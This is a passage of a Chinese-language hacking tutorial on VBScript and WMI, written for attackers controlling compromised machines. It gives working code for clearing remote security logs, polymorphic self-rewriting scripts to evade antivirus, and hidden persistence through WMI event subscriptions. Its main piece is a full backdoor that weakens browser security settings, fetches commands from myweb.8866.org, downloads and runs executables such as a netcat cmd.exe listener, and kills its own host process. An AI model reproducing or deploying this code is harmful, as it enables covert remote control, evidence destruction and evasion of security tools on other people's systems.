那麽,如何知道要連接哪個名字空間,獲得哪些對象呢?《WMI技術指南》[3]中分類列出了大量常用的對象。可惜它沒有相應的電子書,你只有到書店裏找它了。你也可以用WMITools裏WMI CIM Studio這個工具的搜索功能,很容易就能找想要的對象。找到對象後,WMI CIM Studio能列出其屬性和方法,然後到MSDN裏找具體的幫助。而應用舉例,除了我寫的7個RS系列腳本,還有參考資料[4]。
需要特別說明的是,在參考資料[4]中,連接服務器和名字空間用的是類似如下的語法:
Set objWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!//"&strComputer&"/root/cimv2:Win32_Process")
詳細的語法在《WMI技術指南》和MSDN中有介紹,但我們不關心它,因為這種辦法沒有用戶名和密碼參數。 因此,只有在當前用戶在目標系統(含本地)有登陸權限的情況下才能使用。而connectserver如果要本地使用,第一個參數可以是127.0.0.1或者一個點".",第3、4個參數都是空字符串""。
最後,訪問WMI還有一個“特權”的問題。如果你看過ROTS的代碼,你會發現有兩句“奇怪”的語句:
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
這是在向WMI服務申請權限。18和23都是權限代號。下面列出一些重要的代號:
5 在域中創建帳戶
7 管理審計並查看、保存和清理安全日誌
9 加載和卸載設備驅動
10 記錄系統時間
11 改變系統時間
18 在本地關機
22 繞過歷遍檢查
23 允許遠程關機
詳細信息還是請看《WMI技術指南》或MSDN。
所有特權默認是沒有的。我在寫RCAS時,因為忘了申請特權11,結果一直測試失敗,很久才找到原因。
只要有權限連接WMI服務,總能成功申請到需要的特權。這種特權機制,只是為了約束應用程序的行為,加強系統穩定性。有點奇怪的是,訪問註冊表卻不用申請任何特權。真不知道微軟的開發人員是怎麽想的,可能是訪問註冊表太普遍了。
【腳本也有GUI】
雖然系統提供了WScript和CScript兩個腳本宿主,分別負責窗口環境和命令行環境下的腳本運行,但實際上窗口環境下用戶與腳本交互不太方便:參數輸入只能建立快捷方式或彈出InputBox對話框,輸出信息後只有在用戶“確定”後才能繼續運行。完全沒有了窗口環境直觀、快捷的優勢。好在有前面提到的InternetExplorer對象,腳本可以提供web風格的GUI。
還是來看個例子,一個清除系統日誌的腳本,順便復習一下WMI:
set ie=wscript.createobject("internetexplorer.application","event_") ‘創建ie對象‘
ie.menubar=0 ‘取消菜單欄‘
ie.addressbar=0 ‘取消地址欄‘
ie.toolbar=0 ‘取消工具欄‘
ie.statusbar=0 ‘取消狀態欄‘
ie.width=400 ‘寬400‘
ie.height=400 ‘高400‘
ie.resizable=0 ‘不允許用戶改變窗口大小‘
ie.navigate "about:blank" ‘打開空白頁面‘
ie.left=fix((ie.document.parentwindow.screen.availwidth-ie.width)/2) ‘水平居中‘
ie.top=fix((ie.document.parentwindow.screen.availheight-ie.height)/2) ‘垂直居中‘
ie.visible=1 ‘窗口可見‘
with ie.document ‘以下調用document.write方法,‘
.write "<html><body bgcolor=#dddddd scroll=no>" ‘寫一段html到ie窗口中。‘
.write "<h2 align=center>遠程清除系統日誌</h2><br>"
.write "<p>目標IP:<input id=ip type=text size=15>" ‘也可以用navigate方法直接打開一‘
.write "<p>用戶名:<input id=user type=text size=30>" ‘個html文件,效果是一樣的。‘
.write "<p>密碼: <input id=pass type=password size=30>"
.write "<p align=center>類型:" ‘不僅是input對象,所有DHTML支持‘
.write "<input id=app type=checkbox>應用程序 " ‘的對象及其屬性、方法都可以使用。‘
.write "<input id=sys type=checkbox>系統 "
.write "<input id=sec type=checkbox>安全" ‘訪問這些對象的辦法和網頁中訪問‘
.write "<p align=center><br>" ‘框架內對象是類似的。‘
.write "<input id=confirm type=button value=確定> "
.write "<input id=cancel type=button value=取消>"
.write "</body></html>"
end with
dim wmi ‘顯式定義一個全局變量‘
set wnd=ie.document.parentwindow ‘設置wnd為窗口對象‘
set id=ie.document.all ‘設置id為document中全部對象的集合‘
id.confirm.onclick=getref("confirm") ‘設置點擊"確定"按鈕時的處理函數‘
id.cancel.onclick=getref("cancel") ‘設置點擊"取消"按鈕時的處理函數‘
do while true ‘由於ie對象支持事件,所以相應的,‘
wscript.sleep 200 ‘腳本以無限循環來等待各種事件。‘
loop
sub event_onquit ‘ie退出事件處理過程‘
wscript.quit ‘當ie退出時,腳本也退出‘
end sub
sub cancel ‘"取消"事件處理過程‘
ie.quit ‘調用ie的quit方法,關閉IE窗口‘
end sub ‘隨後會觸發event_onquit,於是腳本也退出了‘
sub confirm ‘"確定"事件處理過程,這是關鍵‘
with id
if .ip.value="" then .ip.value="." ‘空ip值則默認是對本地操作‘
if not (.app.checked or .sys.checked or .sec.checked) then ‘app等都是checkbox,通過檢測其checked‘
wnd.alert("至少選擇一種日誌") ‘屬性,來判斷是否被選中。‘
exit sub
end if
set lct=createobject("wbemscripting.swbemlocator") ‘創建服務器定位對象‘
on error resume next ‘使腳本宿主忽略非致命錯誤‘
set wmi=lct.connectserver(.ip.value,"root/cimv2",.user.value,.pass.value) ‘連接到root/cimv2名字空間‘
if err.number then ‘自己捕捉錯誤並處理‘
wnd.alert("連接WMI服務器失敗") ‘這裏只是簡單的顯示“失敗”‘
err.clear
on error goto 0 ‘仍然讓腳本宿主處理全部錯誤‘
exit sub
end if
if .app.checked then clearlog "application" ‘清除每種選中的日誌‘
if .sys.checked then clearlog "system"
if .sec.checked then clearlog "security" ‘註意,在XP下有限制,不能清除安全日誌‘
wnd.alert("日誌已清除")
end with
end sub
sub clearlog(name)
wql="select * from Win32_NTEventLogFile where logfilename=‘"&name&"‘"
set logs=wmi.execquery(wql) ‘註意,logs的成員不是每條日誌,‘
for each l in logs ‘而是指定日誌的文件對象。‘
if l.cleareventlog() then
wnd.alert("清除日誌"&name&"時出錯!")
ie.quit
wscript.quit
end if
next
end sub
總結一下整個過程。首先是創建internetexplorer.application對象。其直接的效果是啟動了一個iexplorer進程,但窗口是不可見的,直到設置了ie.visible=1。然後用document.write方法將html語句寫到ie窗口中。對於復雜的界面,可以將html代碼保存為一個html文件,用ie.navigate(filename)打開。最後是響應窗口中的輸入。這基本上屬於DHTML的知識範疇。
與一般腳本編程最大的不同之處,在於ie是事件驅動的。你所要做的,就是設置好相應的事件處理函數/過程。
在本例中,腳本只關心3個事件:ie退出,"確定"按鈕被點擊,"取消"按鈕被點擊。
註意,例子中只有兩句設置事件處理過程的語句,沒有定義ie退出事件與event_onquit過程關聯。這是因為這裏用到一個特性——創建ie對象時的第二個參數"event_"是一個前綴,ie對象的事件處理過程名是該前綴加事件名。所以onquit事件的處理過程默認就是event_onquit。
當點擊"確定"按鈕後,confirm過程被調用。例子中演示了如何訪問ie中的對象,比如ie.document.all.ip.value就是在"目標IP"文本框中的輸入。如果選中"應用程序"這個checkbox,那麽ie.document.all.app.checked的值是true,否則是false。想調用alert方法,則用ie.document.parentwindow.alert。其他各種ie內對象的訪問方法完全是類似的。具體的可以看DHTML相關資料。
有了web界面,交互就變得豐富多彩了。大家可以充分發揮創意。
比如,很多GUI工具(比如流光)啟動時,有一個logo頁,顯示版權等信息。我們用ie對象也可以模擬一個出來:
set ie=wscript.createobject("internetexplorer.application")
ie.fullscreen=1
ie.width=300
ie.height=150
ie.navigate "about:blank"
ie.left=fix((ie.document.parentwindow.screen.availwidth-ie.width)/2)
ie.top=fix((ie.document.parentwindow.screen.availheight-ie.height)/2)
ie.document.write "<body bgcolor =skyblue scroll=no><br><br>"&_
"<h2 align=center>這是一個Logo</h2></body>"
ie.visible=1
wscript.sleep 5000
ie.quit
上面這段代碼執行後,將在屏幕中央顯示一個連標題欄和邊框都沒有的ie窗口,持續5秒。
窗口裏是藍底黑字的“這是一個Logo”。
腳本GUI化之後,與用戶的交互更直觀。像Nmap那樣有很多參數的工具,在本地使用時,寫一個圖形界面的“接口”就一勞永逸了。輸出的結果也可以用腳本處理,以更適合閱讀的方式顯示,就像流光等工具能生成html掃描報告那樣。
【反查殺】
首先必須說明的是,我完全沒有試圖挑戰殺毒軟件殺毒能力的意思。Windows腳本是一種解釋性語言,明文保存代碼。由於沒有經過編譯過程,代碼的復雜程度遠不如可執行程序(exe)。exe做不到的事,沒理由指望腳本能做到。不過,正因為腳本的反查殺能力很差,以至於殺毒軟件使用的查殺辦法也不高級。於是我們就有機可乘了。
先看看常見的反查殺辦法:
1,字符串或語句的分割/重組。
最典型的例子就是將 fso=createobject("scripting.filesystemobject")
變成 fso=createobject("script"+"ing.filesyste"+"mobject")
這種辦法的擴展是用execute語句:
execute("fso=crea"+"teobject(""scr"+"ipting.filesy"+"stemobject"")")
2,變量名自動改變。
Randomize
Set Of = CreateObject("Scripting.FileSystemObject")
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
fS = Array("Of", "vC", "fS", "fSC")
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)))
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC
上面這段代碼取自愛蟲病毒,大家運行一下,就知道是怎麽回事了。
3,用官方工具——腳本編碼器screnc.exe[5]加密腳本。
加密後的腳本能被腳本宿主直接解釋。本來這是最好的解決辦法,但“槍打出頭鳥”,由於加密是可逆的,現在所有的殺毒軟件都有解碼功能。因此這個辦法的效果基本上為零。
第一個辦法的有效告訴我們這樣一個事實:對腳本病毒的查殺基本上是屬於靜態的。而且,我發現即使只是改變大小寫,也能起到反查效果(只試了一種殺毒軟件)。反查殺的關鍵是減少特征碼。
對於exe的反查殺,最容易想到的就是“加殼”。在腳本上也可以應用這個辦法。比如:
str="cswpire.tohcO"" ""!K"
for i=1 to len(str) step 3
rev=rev+strreverse(mid(str,i,3))
next
execute rev
一個最簡單的“殼”。“殼”的算法是每n個字符反轉順序一次。n就是算法的“種子”,本例中它等於3。
這個“殼”是死的,起不到減少特征碼的效果。反而增加了特征碼,如"cswpire"。
下面看一個復雜些的例子:
str="wscript.echo ""OK!"":randomize:key=int(rnd*8+2):str=rev:str=replace(str,chr(34),chr(34)+chr(34)):set aso=createobject(""ADODB.Stream""):with aso:.open:.writetext ""str=""+chr(34)+str+chr(34)+"":key=""+cstr(key)+"":str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function"":.savetofile wscript.scriptfullname,2:end with":key=1:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function
(註意,該代碼只有一行,沒有回車)
保存成vbs文件,雙擊執行,效果還是和前一段代碼一樣,彈出一個對話框顯示"OK!"。
但是,執行完後再看代碼,可能變成了這樣:
str="tpircsw"" ohce.ar:""!KOezimodnni=yek:8*dnr(trts:)2+ts:ver=alper=r,rts(ec)43(rhc43(rhc,3(rhc+)tes:))4rc=osa jboetaeDA""(tcertS.BDOw:)""maeosa hti:nepo.:tetirw.ts"" txerhc+""=rts+)43(3(rhc+rek:""+)4tsc+""=y+)yek(rr=rts:""cexe:verts etuitcnuf:(ver noi rof:)l ot 1=)rts(nek pets =ver:yerts+veresreverts(dim(yek,i,rtxen:))uf dne:""noitcntevas.:w elifo.tpircsftpircsemanllu dne:2,htiw":key=7:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function
再執行,又變成其他樣子了。這個腳本是自變形的。
如果仔細看代碼就會發現,“殼”的算法依舊,而“種子”隨機改變。但是,加殼過的內容每次不同了,“殼”本身還是沒有任何改變。很多exe加殼工具加的殼,本身就被當作惡意代碼來提取特征碼。為了更好的反查殺,腳本的“殼”也需要動態改變。這就要用到所謂的多態技術。不過,exe的多態是用來反動態查殺的,而腳本的“多態”只是應付靜態查殺,兩者有很大不同。
對於exe,真正的多態目前還未聽說被實現的。腳本也只能做多少算多少。
不影響功能的變形方法,除了上面提到的3種,還有:
1,隨機改變大小寫;
2,冒號(:)與回車符隨機互換(字符串內和"then"之後的冒號除外);
3,字符串分割時,"+"與"&"隨機互換;
4,()+-*/&,等字符兩邊任意添加空格或續行符(_)和回車符的組合;
5,用自定義函數替換內置函數;即使自定義的函數只是簡單的封裝內置函數,但至少改變了關鍵字的位置。
…………
還有其他“多態”算法有待你的研究。
這些算法的應用,是以大幅增加代碼長度為前提的。如果想寫一個比較完美的“殼”,相信會涉及到“文法分析”的知識,因為腳本要“讀懂”自己,從而達到類似Java混淆器的效果,這就很復雜了,有機會再和大家探討。下面我們應用“語句分割”、“變量名自動改變”、“隨機大小寫”、“+和&互換”四種方法,看一下效果如何:
A001="wscript.echo ""OK!"":A004=chr(34):randomize:A005=int(rnd*24000+40960):A001=A006(A001):A000=A005 mod 10+2:A001=replace(A002,A004,A004&A004):set A007=createobject(""ADODB.Stream""):A007.open:A007.writetext hex(A005+1)&""=""&A004&A001&A004&A008("":execute ""&A004&A006(""A000=""&A000&"":A001=A002:execute A001:function A002():for A003=1 to len(A001) step A000:A002=A002+strreverse(mid(A001,A003,A000)):next:end function"")&A004):A007.savetofile wscript.scriptfullname,2:function A006(A009):for A00A=0 to 12:A009=replace(A009,hex(&HA000+A00A),hex(A005+A00A)):next:A006=A009:end function:function A008(A009):for A00A=1 to len(A009):A00B=mid(A009,A00A,1):if int(rnd*2-1) then A00B=ucase(A00B):end if:if A00A>11 and int(rnd*5)=0 then A008=A008&A004&chr(38+int(rnd*2)*5)&A004:end if:A008=A008&A00B:next:end function":A000=1:A001=A002:execute A001:function A002():for A003=1 to len(A001) step A000:A002=A002+strreverse(mid(A001,A003,A000)):next:end function
(註意,其中沒有回車符)
上面是“原版”的,保存為vbs文件雙擊運行,還是彈出對話框顯示"OK!"。再看代碼變形成什麽樣了(效果是隨機的):
B906="tpircsw"" ohce.9B:""!KO(rhc=90nar:)43:ezimodni=A09B2*dnr(t04+00049B:)069B09B=60:)609B(9B=509B dom A09B:2+01lper=6009B(eca,909B,79B&909Btes:)90c=C09B boetaerA""(tcejtS.BDOD:)""maerpo.C09BC09B:netetirw.xeh txe1+A09B(B&""=""&)09B&909&909B&6:""(D09Betucexe909B&"" ""(B09B&&""=509B:""&509B9B=609Bcexe:709B etucnuf:609B noitof:)(70=809B rel ot 1)609B(nB pets 09B:509+709B=7everrtsdim(esrB,609B(09B,809xen:))5f dne:tnoitcnu909B&)"".C09B:)fotevascsw elics.tpirluftpir2,emanlitcnuf:B09B no:)E09B(09B rof ot 0=FE09B:21calper=,E09B(eBH&(xeh09B+509(xeh,)F9B+A09Ben:))F0B09B:txe:E09B=cnuf dnuf:noit noitcn9B(D09Brof:)E01=F09B nel ot :)E09B(im=019B,E09B(d)1,F09Btni fi:-2*dnr(neht )1u=019B 9B(esacdne:)01 fi:fi 11>F09Bni dna 5*dnr(teht 0=)=D09B n9B&D09B(rhc&90(tni+83*)2*dnr909B&)5fi dne:B=D09B:19B&D09:txen:0nuf dnenoitc":EXecUTe "B9"&"05=7"&":B906"&"=B907:E"+"XEc"+"utE B906"+":FuN"&"ctIoN B9"&"07():fOr"+" B9"+"08=1 tO l"&"En(B906)"+" step B905:B907"&"=B907+"&"sTRreVErSe(MId("&"B9"&"0"&"6,B908,B905"&")"+"):N"+"eX"+"t"+":eNd fUN"&"CtiOn"
眼花了沒?再來一次:
F0CB="rcsw.tpiohceKO"" F:""!=EC0(rhc:)43dnarzimo0F:ei=FCr(tn2*dn0004904+:)06BC0FD0F=0F(0:)BCAC0FC0F=om F01 dF:2+=BC0lper(ecaCC0FC0F,0F,EF&EC)EC0tes:D0F rc=1etaeejbo""(tcDODAtS.BmaerF:)"".1D0nepoD0F:rw.1teti txe(xehFC0F&)1+&""=""EC0FC0F&0F&BF&EC(2D0xe:""tuce&"" eEC0FD0F&F""(0=AC00F&""""&ACC0F:0F=Be:CCucex etBC0Fnuf:oitc0F n)(CCrof:C0F 1=Dl otF(ne)BC0ets 0F pF:AC=CC0CC0Frts+ever(esr(dimBC0FC0F,0F,D))ACxen:ne:tuf ditcn)""noC0F&F:)E.1D0evasifotw elircss.tppircluftmanl:2,ecnufnoitD0F 0F(0:)3D rof4D0Ft 0=21 oD0F:er=3calp0F(eh,3D&(xeC0FH0F+A,)4D(xehFC0FD0F+:))4txenD0F:0F=0e:3Df dntcnu:noicnufnoitD0F 0F(2:)3D rof4D0Ft 1=el o0F(n:)3D5D0Fdim=D0F(0F,31,4Dfi:)tni dnr(1-2*ht )F ne=5D0sacu0F(e:)5D dnei:fi0F f1>4Dna 1ni dnr(t)5*dt 0= neh2D0FD0F=0F&2c&EC3(rhni+8nr(t)2*d&)5*EC0Fdne::fi 2D0FD0F=0F&2n:5D:txe dnecnufnoit":eXecUtE "F"+"0CA"&"=4:F0CB"+"="+"F0CC:eX"+"e"+"cUte F0CB"&":F"+"UNC"+"tIOn F0CC():F"+"or"+" F0"&"CD=1 tO LEN(F0CB) sTEp F0CA:F0CC=F0CC+strR"+"Ever"+"SE"&"(mID("+"F0CB,"+"F0CD,F0CA)):nEXT:eNd FU"&"nCTIo"&"N"
這樣夠了嗎?——不知道。也許殺毒引擎本來就是忽略大小寫的,本來就能自動連接字符串,本來就能“文法分析”……
這個“殼”有實用性嗎?——沒有。因為“殼”的算法太簡單。“種子”A000 = A005 mod 10 + 2,所以如果不考慮自動改變的變量名,加殼後的代碼只有10種樣子。
如何改進這個“殼”?——當然是用更復雜的算法,更多的“多態”。
如果你有興趣,可以先看那個“原版”的腳本代碼(把冒號都替換為回車,可讀性就比較好了),然後自己加強它。
當然,你也可以另起爐竈,自由展現你的創意。
【來做個後門】
在討論腳本後門前,先要介紹一類很有用的WMI對象。事實上,這才是本節的關鍵。腳本後門不過是它的一個應用而已。
前面已經說過,WMI是事件驅動的。整個事件處理機制分為四個部分:
1,事件生產者(provider):負責產生事件。WMI包含大量的事件生產者。有性能計數器之類的具體的事件生產者,也有類、實例的創建、修改、刪除等通用的事件生產者。
2,事件過濾器(filter):系統每時每刻都在產生大量的事件,通過自定義過濾器,腳本可以捕獲感興趣的事件進行處理。
3,事件消費者(consumer):負責處理事件。它可以是可執行程序、動態鏈接庫(dll,由WMI服務加載)或者腳本。
4,事件綁定(binding):通過將過濾器和消費者綁定,明確什麽事件由什麽消費者負責處理。
事件消費者可以分為臨時的和永久的兩類。臨時的事件消費者只在其運行期間關心特定事件並處理。永久消費者作為類的實例註冊在WMI名字空間中,一直有效直到它被註銷。顯然,永久事件消費者更具實用性。還是來看個例子:
nslink="winmgmts://./root/cimv2:" ‘只需要本地連接,所以用這種語法,不用swbemlocator對象‘
set asec=getobject(nslink&"ActiveScriptEventConsumer").spawninstance_ ‘創建“活動腳本事件消費者”‘
asec.name="stopped_spooler_restart_consumer" ‘定義消費者的名字‘
asec.scriptingengine="vbscript" ‘定義腳本語言(只能是vbscript)‘
asec.scripttext="getobject(""winmgmts:win32_service=‘spooler‘"").startservice" ‘腳本代碼‘
set asecpath=asec.put_ ‘註冊消費者,返回其鏈接‘
set evtflt=getobject(nslink&"__EventFilter").spawninstance_ ‘創建事件過濾器‘
evtflt.name="stopped_spooler_filter" ‘定義過濾器的名字‘
qstr="select * from __instancemodificationevent within 5 " ‘每5秒查詢一次“實例修改事件”‘
qstr=qstr&"where targetinstance isa ""win32_service"" and " ‘目標實例的類是win32_service‘
qstr=qstr&"targetinstance.name=""spooler"" " ‘實例名是spooler‘
qstr=qstr&"and targetinstance.state=""stopped""" ‘實例的state屬性是stopped‘
evtflt.query=qstr ‘定義查詢語句‘
evtflt.querylanguage="wql" ‘定義查詢語言(只能是wql)‘
set fltpath=evtflt.put_ ‘註冊過濾器,返回其鏈接‘
set fcbnd=getobject(nslink&"__FilterToConsumerBinding").spawninstance_ ‘創建過濾器和消費者的綁定‘
fcbnd.consumer=asecpath.path ‘指定消費者‘
fcbnd.filter=fltpath.path ‘指定過濾器‘
fcbnd.put_ ‘執行綁定‘
wscript.echo "安裝完成"
這個腳本的效果是:當“後臺打印”服務(spooler)狀態改變為停止時,消費者將進行處理——重啟spooler。
先net start spooler,然後net stop spooler。最多5秒鐘,spooler又會啟動。
直接運行上面的腳本會出錯,因為“活動腳本事件消費者”(ActiveScriptEventConsumer ASEC)默認沒有被安裝到root/cimv2名字空間。
用記事本打開%windir%/system32/wbem/scrcons.mof,將第一行“#pragma namespace ("////.//Root//Default")”刪除,或者修改為“#pragma namespace ("////.//Root//cimv2")”。XP/2003沒有這一行,不用修改。
然後執行下面這個命令:
C:/WINNT/system32/wbem>mofcomp.exe -N:root/cimv2 scrcons.mof
Microsoft (R) 32-bit MOF 匯編器版本 1.50.1085.0007
版權所有 (c) Microsoft Corp. 1997-1999。保留所有權利。
正在分析 MOF 文件: scrcons.mof
MOF 文件分析成功
將數據儲存到儲備庫中...
已完成!
這樣就把ASEC安裝到root/cimv2了。mofcomp.exe和scrcons.mof都是系統自帶的。
2000默認將ASEC安裝到root/default名字空間,而XP/2003默認已經安裝到root/subscription名字空間,但由於事件過濾器不能跨名字空間捕捉事件(XP/2003可以),事件綁定也不能跨名字空間,而大部分事件都在root/cimv2產生,所以需要重新安裝ASEC到事件源所在的名字空間。下面這個腳本自動完成ASEC重安裝任務。
set shl=createobject("WScript.Shell")
set fso=createobject("Scripting.FileSystemObject")
path=shl.expandenvironmentstrings("%windir%/system32/wbem/")
set mof=fso.opentextfile(path&"scrcons.mof",1,false,-1) ‘mof都是Unicode格式的‘
mofs=mof.readall
mof.close
mofs=replace(mofs,"//Default","//cimv2",1,1) ‘替換默認的名字空間‘
mofp=path&"asecimv2.mof"
set mof=fso.createtextfile(mofp,false,true) ‘創建臨時mof文件‘
mof.write mofs
mof.close
shl.run path&"mofcomp.exe -N:root/cimv2 "&mofp,0,true ‘安裝到root/cimv2‘
fso.deletefile(mofp)
wscript.echo "安裝完成"
註銷永久事件:
nslink="winmgmts://./root/cimv2:"
myconsumer="stopped_spooler_restart_consumer" ‘指定消費者的名字‘
myfilter="stopped_spooler_filter" ‘指定過濾器的名字‘
set binds=getobject(nslink&"__FilterToConsumerBinding").instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
getobject("winmgmts:"&bind.consumer).delete_ ‘刪除消費者‘
getobject("winmgmts:"&bind.filter).delete_ ‘刪除過濾器‘
bind.delete_ ‘刪除綁定‘
exit for
end if
next
wscript.echo "卸載完成"
除了ASEC,WMI還提供其他永久事件消費者,比如SMTPEventConsumer。當系統出現異常時,可以通過它自動給管理員的信箱發信。WMITools裏的WMI Event Registration用於創建、修改、刪除指定名字空間裏的永久事件消費者、事件過濾器和計時器事件源的實例,以及綁定或解除綁定它們。
關於事件處理機制的各個部分,在《WMI技術指南》裏有詳細的講述,MSDN裏當然更全面。我就點到為止了。
(看累了吧,喝口水,休息一下 ^_^)
下面開始討論腳本後門。
WMI提供了兩個計時器:__AbsoluteTimerInstruction和__IntervalTimerInstruction,分別在指定的時刻和時間間隔觸發事件,註冊一個過濾器來捕獲計時器事件,再和ASEC綁定,我們就獲得了一種少見的程序自啟動的方法。而且,腳本代碼完全隱藏在CIM存儲庫中,不以獨立的文件存在,查殺比較困難。這是腳本後門的優勢,但困難也不少:
1,腳本運行時,由系統自帶的scrcons.exe作為腳本宿主(Windows的設計者還沒有笨到用WMI服務作為腳本宿主)。這就會增加一個進程,雖然是系統正常的進程,殺毒軟件拿它沒轍,但還是太顯眼了。所以,不能讓腳本一直在後臺運行,而是應該每隔一段時間啟動一次,然後盡快結束。腳本結束後,scrcons.exe進程不會自動結束,必須讓腳本借助WMI提供的Win32_Process對象主動終止宿主進程(煮豆燃豆萁?!)。
2,腳本的網絡功能很差,基本上只能依靠Microsoft.XMLHTTP之類的對象。因此,腳本後門不能監聽端口並提供cmd shell,只能反向連接到web服務器,獲取控制命令。一個可行的辦法是,在web服務器上放一個命令文件,腳本後門根據域名找到服務器並下載命令文件,再根據文件內容作出響應。所以,你需要一臺web服務器,或者用netbox等工具建個臨時服務器。當然,你不需要讓服務器總是在線,需要控制腳本後門時再運行就可以了。
3,由於腳本後門間歇式運行,需要防止重復運行同一個命令。解決方法是在註冊表裏記錄命令的長度,每次獲取命令後將長度和記錄做比較,如果相同則跳過,不同則覆蓋並執行命令。
4,為了借助ie對象穿透防火墻,XMLHTTP對象必須在ie中被創建,這會受到Internet域安全級別的限制。即使將代碼保存在html文件中再用ie打開,也不過是“我的電腦”域,創建不安全的ActiveX對象還是會彈出警告對話框。解決辦法是修改註冊表,臨時更改安全設置。
5,WScript對象由wscript.exe或cscript.exe提供,而scrcons.exe沒有提供,所以很多常用的功能,比如WScript.Sleep都不能用了。不能Sleep就無法異步使用XMLHTTP,而同步XMLHTTP可能被長時間阻塞,大大不利於後門的隱蔽。調用ping命令來延時會創建新進程,用WScript.Shell的Popup方法延時則有“咚”一聲提示音。好在Microsoft.XMLHTTP的“親戚”不少,比如Msxml2.XMLHTTP、Msxml2.ServerXMLHTTP、Msxml2.DOMDocument、WinHttp.WinHttpRequest等。最後那個可以設置超時時間,剛好滿足需要。
即使有重重困難,腳本後門仍然值得挑戰一下。當肉雞上的各類木馬紛紛被殺毒軟件肅清後,一個24小時才運行一次的腳本後門可能是你最後的希望。
下面是一個簡單的腳本後門的核心代碼(沒有安裝功能):
cmdu="http://myweb.8866.org/cmd.txt" ‘從web服務器獲取命令的url‘
cmdw=4000 ‘下載超時時間4秒‘
cmdl="HKLM/SOFTWARE/Microsoft/WBEM/CIMOM/CmdLength" ‘記錄命令長度的鍵值名‘
on error resume next ‘忽略非致命錯誤 ‘(調試時註釋掉本行)
set shl=createobject("WScript.Shell") ‘雖然不能使用WScript根對象,其子對象還是可以用的‘
set aso=createobject("ADODB.Stream")
set ie=createobject("InternetExplorer.Application") ‘使用ie繞過防火墻‘
zone="HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/3"
set1=zone&"/1201"
set2=zone&"/1400"
set3=zone&"/CurrentLevel"
val1=shl.regread(set1) ‘保存原來的安全設置‘
val2=shl.regread(set2)
val3=shl.regread(set3)
regd="REG_DWORD"
shl.regwrite set1,0,regd ‘允許在Internet域運行不安全的ActiveX‘
shl.regwrite set2,0,regd ‘允許活動腳本‘
shl.regwrite set3,0,regd ‘設置當前Internet域安全級別為“自定義”‘
ie.visible=0 ‘:ie.visible=1 ‘(調試用)
ie.navigate "about"&":blank" ‘這裏使用字符串連接純屬反論壇過濾‘
ie.document.write _
"<script>function whr(){return new ActiveXObject(‘WinHttp.WinHttpRequest.5.1‘)}</script>"
set whr=ie.document.script.whr() ‘在ie內創建WinHttpRequest對象‘
whr.settimeouts cmdw,cmdw,cmdw,cmdw ‘設置域名解析、連接、發送和接收超時時間‘
whr.open "GET",cmdu,true ‘獲取命令文件‘
whr.send
if not whr.waitforresponse(cmdw) then die
if whr.status>299 then die
rt=whr.responsetext ‘:wscript.echo rt ‘(調試用)
‘:shl.regwrite cmdl,0,regd ‘(調試用)
if len(rt)=shl.regread(cmdl) then die ‘與前一個命令的長度比較‘
shl.regwrite cmdl,len(rt),regd ‘更新命令長度‘
cmds=split(rt,vbcrlf,-1)
if ubound(cmds)<1 then die
cmdt=lcase(trim(cmds(0))) ‘:wscript.echo cmdt ‘(調試用)
aso.type=1
aso.open
cd=shl.currentdirectory&chr(92)
select case cmdt ‘分析命令文件類型‘
case "‘vbs" ‘是vbs‘
execute(rt) ‘直接在當前腳本上下文中執行‘
die
case ":bat" ‘是批處理‘
aso.write whr.responsebody
aso.savetofile cd&"_.bat",2 ‘保存在當前目錄‘
aso.close
shl.run chr(34)&cd&"_.bat""",0 ‘運行批處理‘
die
case "‘wsh" ‘是Windows腳本‘
aso.write whr.responsebody
aso.savetofile cd&"_.vbs",2 ‘保存在當前目錄‘
aso.close
shl.run "cscript.exe """&cd&"_.vbs""",0 ‘使用cscript作為腳本宿主‘
die
case "exe" ‘exe需進一步分析‘
case else die
end select
if ubound(cmds)<4 then die ‘:wscript.echo cmds(1) ‘(調試用)
whr.open "GET",cmds(1),true ‘從指定位置下載exe文件‘
whr.send
if not whr.waitforresponse(cmds(2)) then die
if whr.status>299 then die
path=shl.expandenvironmentstrings(cmds(3))‘展開保存路徑中的環境變量‘
aso.write whr.responsebody ‘:wscript.echo path ‘(調試用)
aso.savetofile path,2 ‘保存exe文件‘
aso.close
shl.run chr(34)&path&""" "&cmds(4),0 ‘執行exe‘
die
sub die
ie.quit
shl.regwrite set1,val1,regd ‘還原Internet域安全設置‘
shl.regwrite set2,val2,regd
shl.regwrite set3,val3,regd
for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_
if lcase(ps.name)="scrcons.exe" then ps.terminate ‘自殺‘
next
‘wscript.echo "die": wscript.quit ‘(調試用)
end sub
取消調試語句的註釋,上面這段核心代碼就可以直接運行。
它將試圖從myweb.8866.org上獲取cmd.txt,根據裏面的內容進一步行動。
cmd.txt看起來像這樣:
exe //被執行的文件類型,可以是‘vbs、:bat、exe或‘wsh
http://myweb.8866.org/nc.exe //被執行的文件的下載url
4000 //下載超時時間,單位毫秒
%windir%/system32/nc.exe //文件的保存位置,支持環境變量
-L -p 1234 -e cmd.exe //命令行參數
收到上面這個命令後,腳本將從指定url下載nc.exe,保存到系統目錄並運行。
如果第一行的文件類型為‘vbs、‘wsh或:bat,則把命令文件本身當作腳本或批處理來執行。比如:
:bat
net start telnet :啟動telnet服務
del %0 :自刪除
如果只是想讓某臺主機執行命令,可以這樣:
:bat
ipconfig | find "123.45.67.89" && net start telnet
del %0
這樣就只有ip地址為123.45.67.89的主機才會啟動telnet。
‘wsh和‘vbs的區別是,前者保存為文件由cscript.exe調用,後者直接在腳本後門“內部”執行。
